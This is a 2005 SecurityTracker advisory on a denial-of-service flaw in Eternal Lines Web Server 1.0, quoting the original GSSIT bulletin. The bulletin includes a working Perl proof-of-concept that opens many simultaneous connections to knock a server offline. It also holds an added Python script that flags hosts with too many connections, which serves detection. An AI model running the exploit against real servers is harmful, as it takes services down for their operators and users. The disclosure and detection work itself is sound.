SecurityTracker.com
Category:  Application (Web Server/CGI)  >  Eternal Lines Web Server
Vendors:  EternalLines.com
Eternal Lines Web Server Lets Remote Users Deny Service With Multiple Simultaneous Connections
SecurityTracker Alert ID:  1013046
SecurityTracker URL:  http://securitytracker.com/id?1013046
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 31 2005
Impact:  Denial of service via network
Exploit Included:  Yes  
Advisory:  Global Security Solution IT (GSSIT)
Version(s): 1.0
Description:  Ziv Kamir of Global Security Solution IT reported a vulnerability in Eternal Lines Web Server. A remote user can cause denial of service conditions.

A remote user can open approximately 70 simultaneous connections to the target web server from the same originating host to cause the target web server to stop accepting connections.

The vendor was notified on January 26, 2005.

Impact:  A remote user can cause the target web server to stop accepting connections.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.eternallines.com/webserver/index.html
Cause:  State error
Underlying OS:  Windows (Any)
Reported By:  GSS IT <gss_it@yahoo.com>
Message History:   None.
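
With no fix available, an operator can watch for the condition described above by counting established connections per remote host on the server. The following is an added example, not part of the advisory or the vendor's software; the sample `netstat -an` output, the port (80) and the threshold (50) are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample in the layout of Windows `netstat -an` (documentation IP ranges).
SAMPLE_HEADER = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    192.0.2.10:80          203.0.113.5:49500      ESTABLISHED
  TCP    192.0.2.10:80          203.0.113.5:49501      TIME_WAIT
  TCP    [2001:db8::10]:80      [2001:db8::99]:50000   ESTABLISHED
  TCP    192.0.2.10:3389        198.51.100.7:51000     ESTABLISHED
"""
# 72 constructed connections from one host, in line with the ~70 in the advisory.
SAMPLE = SAMPLE_HEADER + "".join(
    f"  TCP    192.0.2.10:80          198.51.100.7:{52000 + n}     ESTABLISHED\n"
    for n in range(72)
)

ROW = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s*$")

def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr]:port' into (addr, port)."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), port

def connections_per_host(netstat_text, server_port=80):
    """Count ESTABLISHED connections to server_port, grouped by remote address."""
    counts = Counter()
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, blank line, or non-TCP row
        local, remote, state = m.groups()
        if state != "ESTABLISHED":
            continue
        if split_endpoint(local)[1] != str(server_port):
            continue  # connection to some other local service
        counts[split_endpoint(remote)[0]] += 1
    return counts

def flag_hosts(netstat_text, server_port=80, threshold=50):
    """Return {remote_host: count} at or above threshold (assumed value, below ~70)."""
    counts = connections_per_host(netstat_text, server_port)
    return {host: n for host, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    for host, n in flag_hosts(SAMPLE).items():
        print(f"{host}: {n} established connections to port 80")
```

The same per-source count can back a connection limit on a firewall or reverse proxy in front of the server.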


 Source Message Contents

Date:  Mon, 31 Jan 2005 02:44:34 -0800 (PST)
From:  GSS IT <gss_it@yahoo.com>
Subject:  Eternal Lines Web Server Ver 1.0

 
 
 
31/01/05
 
 
====================================
 GSSIT - Global Security Solution IT
====================================		
 
-------------------------------------------------------
 
Application: Eternal Lines Web Server
Web Site:    www.eternallines.com
Versions:    1.0
Platform:    Windows 
 
             
                           
Credits:
########
 
#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     WEB : www.gssit.co.il             #
#                                       #
#                                       #
#########################################
 
---------------------
 
1) Introduction
2) Bug
3) The Code
4) Fix
 
 
================
1) Introduction
================
 
Eternal Lines Web Server is a free Web Server for use with Windows.
 
Features:
 
HTTP/1.0 and HTTP/1.1 compliant 
Support CGI/1.1 executables 
Bandwidth limits 
 
=======
2) Bug
=======
 
A remote user can open approximately 70 simultaneous connections from the same host 
to cause the target web server to stop accepting connections.
 
 
===========
3) The Code
===========
 
#####################################################################################################
#!/usr/bin/perl
##############################################################
#             GSS-IT Research And Security Labs              #
##############################################################
#                                                            #
#                      www.gssit.co.il                       #
#                                                            #
##############################################################
#   Eternal Lines Web Server Ver 1.0 Denial Of Service POC   #
##############################################################

use Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');

if (($#ARGV) < 2)
{
    print("##########################################################\n");
    print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #\n");
    print("##########################################################\n\n");
    print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
    exit
}

print("##########################################################\n");
print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #\n");
print("##########################################################\n");

for ($i=1; $i<80; $i++)
{
    socket($i, PF_INET, SOCK_STREAM, $proto );
    $dest = sockaddr_in ($port, inet_aton($host));
    if (!(connect($i, $dest)))
    {
        Slp();
    }
}

print("==> Unsuccesful <==");
exit;

sub Slp
{
    print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
    print("The Server Will Be Down For $slp Seconds\n\n");
    sleep ($slp);
    print("==> Killing Connections ...<==\n");
    for ($j=1; $j<80; $j++)
    {
        shutdown($j,2);
    }
    print ("[#] Back To Work Server Up [#] ");
    exit;
}
#####################################################################################################

======
4) Fix
======

Date of Vendor Notification:
----------------------------
26/01/05

Response :
=========
No Response.

==============================================================================================
*** The Data is for educational purpose only.
*** The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages.
==============================================================================================



Copyright 2005, SecurityGlobal.net LLC